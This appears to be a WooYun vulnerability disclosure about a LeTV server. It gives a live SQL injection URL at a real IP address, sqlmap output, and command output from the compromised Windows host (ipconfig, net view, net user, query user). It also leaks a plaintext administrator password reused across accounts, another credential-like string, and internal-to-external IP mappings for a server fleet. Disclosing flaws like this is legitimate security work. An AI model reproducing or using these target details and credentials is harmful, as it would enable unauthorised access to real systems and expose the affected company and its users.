WooYun.org

SQL注入地址:
http://115.182.51.182:8090//web/dept.php
[03:56:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 4.1
c:\> ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : WIN-SKTH4MFTLEV
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
物理地址. . . . . . . . . . . . . : 00-50-56-89-1A-20
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::6df0:6624:a50a:ebed%11(首选)
IPv4 地址 . . . . . . . . . . . . : 115.182.51.182(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 115.182.51.1
DHCPv6 IAID . . . . . . . . . . . : 234901590
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-17-01-F0-95-00-50-56-89-1A-20
DNS 服务器 . . . . . . . . . . . : 219.141.136.10
219.141.140.10
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{E8BF1C9C-D390-4948-95D5-745DC82A29AB}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:244c:28e2:8c49:cc49(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::244c:28e2:8c49:cc49%13(首选)
默认网关. . . . . . . . . . . . . :
TCPIP 上的 NetBIOS . . . . . . . : 已禁用
隧道适配器 6TO4 Adapter:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2002:73b6:33b6::73b6:33b6(首选)
默认网关. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
DNS 服务器 . . . . . . . . . . . : 219.141.136.10
219.141.140.10
TCPIP 上的 NetBIOS . . . . . . . : 已禁用


c:\> net view
服务器名称 注解
-------------------------------------------------------------------------------
\\LETV letv server (Samba, Ubuntu)
\\SVCTAG-BSDNK2X
\\WIN-496RU2U6F1F
\\WIN-SKTH4MFTLEV
命令成功完成。
c:\> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator

*****nx*****

ian duhaibin
Guest liguotao
命令运行完毕，但发生一个或多个错误。
c:\> query user
用户名 会话名 ID 状态 空闲时间 登录时间
c

*****xu*****

ian 2 断开 27+15:38 2015/1/6 14:20
l

*****ot*****

o 3 断开 1+08:57 2015/1/23 15:58
administrator 4 断开 6+17:04 2015/1/7 17:28
WIN-SKTH4MFTLEV\c

*****eji*****

:letv123!@#
WIN-SKTH4MFTLEV\

*****uo*****

:letv123!@#
WIN-SKTH4MFTLEV\Administrator:letv123!@#
ItGzjI7fAqMgrk2
219.153.14.131
10.1.14.131
ItGzjI7fAqMgrk2
220.178.229.12
10.1.229.12
IP1 低 管理卡 临时管理卡
113.6.235.10 10.1.235.10 113.6.235.110
113.6.235.11 10.1.235.11 113.6.235.111
113.6.235.12 10.1.235.12 113.6.235.112
113.6.235.13 10.1.235.13 113.6.235.113
113.6.235.14 10.1.235.14 113.6.235.114
113.6.235.15 10.1.235.15 113.6.235.115
113.6.235.16 10.1.235.16 113.6.235.116
113.6.235.17 10.1.235.17 113.6.235.117
113.6.235.18 10.1.235.18 113.6.235.118
113.6.235.19 10.1.235.19 113.6.235.119
113.6.235.20 10.1.235.20 113.6.235.120
113.6.235.21 10.1.235.21 113.6.235.121
113.6.235.22 10.1.235.22 113.6.235.122
113.6.235.23 10.1.235.23 113.6.235.123
113.6.235.24 10.1.235.24 113.6.235.124
vi /etc/sysconfig/network-scripts/ifcfg-eth0
service network restart
calvin
TVLE800G
掩码：255.255.255.128
网关：113.6.235.1
CDN-HLJ-HEB-CNC-